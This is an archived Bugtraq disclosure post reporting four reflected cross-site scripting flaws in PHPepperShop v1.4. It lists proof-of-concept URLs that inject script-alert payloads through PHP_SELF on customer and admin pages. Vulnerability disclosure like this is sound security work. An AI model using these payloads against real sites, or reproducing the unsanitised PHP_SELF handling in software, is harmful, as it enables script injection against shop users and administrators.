[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in PHPepperShop v 1.4

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in PHPepperShop v 1.4
From: th3.r00k.ieatpork@xxxxxxxxxxxxxx
Date: 8 Dec 2008 03:48:39 -0000

Vulnerable Version:PHPepperShop v 1.4
Homepage:http://www.phpeppershop.com

This is 4 reflective XSS flaws in the URI. Trust no one not even your 
$_SERVER[PHP_SELF]

http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script>

http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/";<script>alert(1)</script>

Prev by Date: Two XSS Flaws in PrestaShop 1.1.0.3
Next by Date: RadAsm <=2.2.1.5 Local Command Execution
Previous by thread: Two XSS Flaws in PrestaShop 1.1.0.3
Next by thread: RadAsm <=2.2.1.5 Local Command Execution
Index(es):
- Date
- Thread